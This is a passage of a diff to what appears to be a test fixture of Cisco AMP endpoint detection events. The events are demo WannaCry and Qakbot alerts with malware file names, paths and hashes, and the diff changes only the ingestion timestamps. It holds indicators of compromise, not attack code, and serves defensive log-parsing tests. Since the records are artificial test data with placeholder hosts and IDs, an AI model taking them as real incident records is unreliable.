delete\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "code": "2164260880", "kind": "alert", @@ -293,7 +293,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:47.010654600Z", + "ingested": "2021-12-14T14:40:52.874134722Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275390665097000,\"timestamp\":1610645989,\"timestamp_nanoseconds\":831000000,\"date\":\"2021-01-14T17:39:49+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419275390665097297\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "code": "1090519054", "kind": "alert", @@ -392,7 +392,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:47.010659500Z", + "ingested": "2021-12-14T14:40:52.874135193Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275390665097000,\"timestamp\":1610645989,\"timestamp_nanoseconds\":706000000,\"date\":\"2021-01-14T17:39:49+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Gen.20gl.1201\",\"detection_id\":\"6419275390665097296\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"},\"parent\":{\"process_id\":708,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}", "code": "1090519054", "kind": "alert", @@ -495,7 +495,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:47.010664700Z", + "ingested": "2021-12-14T14:40:52.874135692Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275390665097000,\"timestamp\":1610645989,\"timestamp_nanoseconds\":643000000,\"date\":\"2021-01-14T17:39:49+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Gen.20gl.1201\",\"detection_id\":\"6419275390665097295\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"},\"parent\":{\"process_id\":708,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}", "code": "1090519054", "kind": "alert", @@ -573,7 +573,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:47.010669200Z", + "ingested": "2021-12-14T14:40:52.874136152Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419275390665097000,\"timestamp\":1610645989,\"timestamp_nanoseconds\":721000000,\"date\":\"2021-01-14T17:39:49+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419275390665097296\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "code": "553648143", "kind": "alert", @@ -645,7 +645,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:47.010674600Z", + "ingested": "2021-12-14T14:40:52.874136591Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411525251028484000,\"timestamp\":1610643578,\"timestamp_nanoseconds\":698000000,\"date\":\"2021-01-14T16:59:38+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6411525251028484105\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\"}}}}", "code": "2164260880", "kind": "alert", @@ -737,7 +737,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:47.010679800Z", + "ingested": "2021-12-14T14:40:52.874137086Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411525251028484000,\"timestamp\":1610643578,\"timestamp_nanoseconds\":214000000,\"date\":\"2021-01-14T16:59:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6411525251028484105\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"MspthrdHash.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\MspthrdHash\\\\MspthrdHash.exe\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\",\"sha1\":\"8cf0ca99a8f5019d8583133b9a9379299c45470c\",\"md5\":\"6894b3834bd541fa85df79e44568acac\"}}}}", "code": "1090519054", "kind": "alert", @@ -827,7 +827,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:47.010685100Z", + "ingested": "2021-12-14T14:40:52.874137702Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411525251028484000,\"timestamp\":1610643578,\"timestamp_nanoseconds\":183000000,\"date\":\"2021-01-14T16:59:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6411525251028484104\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"MspthrdHash.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\MspthrdHash\\\\MspthrdHash.exe\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\",\"sha1\":\"8cf0ca99a8f5019d8583133b9a9379299c45470c\",\"md5\":\"6894b3834bd541fa85df79e44568acac\"}}}}", "code": "1090519054", "kind": "alert", @@ -901,7 +901,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:47.010690300Z", + "ingested": "2021-12-14T14:40:52.874138165Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411525251028484000,\"timestamp\":1610643578,\"timestamp_nanoseconds\":698000000,\"date\":\"2021-01-14T16:59:38+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6411525251028484104\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\"}}}}", "code": "553648143", "kind": "alert", @@ -973,7 +973,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:47.010695900Z", + "ingested": "2021-12-14T14:40:52.874138723Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264043361501000,\"timestamp\":1610643347,\"timestamp_nanoseconds\":888000000,\"date\":\"2021-01-14T16:55:47+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6419264043361501262\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}", "code": "2164260893", "kind": "alert", @@ -1049,7 +1049,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:47.010701200Z", + "ingested": "2021-12-14T14:40:52.874139470Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264043361501000,\"timestamp\":1610643347,\"timestamp_nanoseconds\":779000000,\"date\":\"2021-01-14T16:55:47+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6419229331435814969\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}", "code": "2164260893", "kind": "alert", @@ -1125,7 +1125,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:47.010706800Z", + "ingested": "2021-12-14T14:40:52.874139958Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264043361501000,\"timestamp\":1610643347,\"timestamp_nanoseconds\":716000000,\"date\":\"2021-01-14T16:55:47+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6419204905956802579\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}", "code": "2164260893", "kind": "alert", @@ -1201,7 +1201,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:47.010712300Z", + "ingested": "2021-12-14T14:40:52.874140403Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264043361501000,\"timestamp\":1610643347,\"timestamp_nanoseconds\":888000000,\"date\":\"2021-01-14T16:55:47+00:00\",\"event_type\":\"Retrospective Quarantine\",\"event_type_id\":553648155,\"detection_id\":\"6419264043361501261\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}", "code": "553648155", "kind": "alert", @@ -1279,7 +1279,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:47.010717500Z", + "ingested": "2021-12-14T14:40:52.874140847Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264043361501000,\"timestamp\":1610643347,\"timestamp_nanoseconds\":872000000,\"date\":\"2021-01-14T16:55:47+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419264043361501262\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"u.wnry\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\u.wnry\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}", "code": "553648147", "kind": "alert", @@ -1363,7 +1363,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:47.010723Z", + "ingested": "2021-12-14T14:40:52.874141324Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264043361501000,\"timestamp\":1610643347,\"timestamp_nanoseconds\":872000000,\"date\":\"2021-01-14T16:55:47+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419264043361501261\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"@WanaDecryptor@.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\@WanaDecryptor@.exe\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\",\"sha1\":\"45356a9dd616ed7161a3b9192e2f318d0ab5ad10\",\"md5\":\"7bf2b57f2a205768755c07f238fb32cc\"}}}}", "code": "553648147", "kind": "alert", @@ -1443,7 +1443,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:47.010728300Z", + "ingested": "2021-12-14T14:40:52.874143439Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264043361501000,\"timestamp\":1610643347,\"timestamp_nanoseconds\":763000000,\"date\":\"2021-01-14T16:55:47+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419229331435814969\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"u.wnry\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\u.wnry\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}", "code": "553648147", "kind": "alert", @@ -1523,7 +1523,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:47.010733500Z", + "ingested": "2021-12-14T14:40:52.874143820Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264043361501000,\"timestamp\":1610643347,\"timestamp_nanoseconds\":716000000,\"date\":\"2021-01-14T16:55:47+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419204905956802579\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"u.wnry\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\u.wnry\",\"identity\":{\"sha256\":\"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25\"}}}}", "code": "553648147", "kind": "alert", @@ -1597,7 +1597,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:47.010738700Z", + "ingested": "2021-12-14T14:40:52.874144227Z", "original": 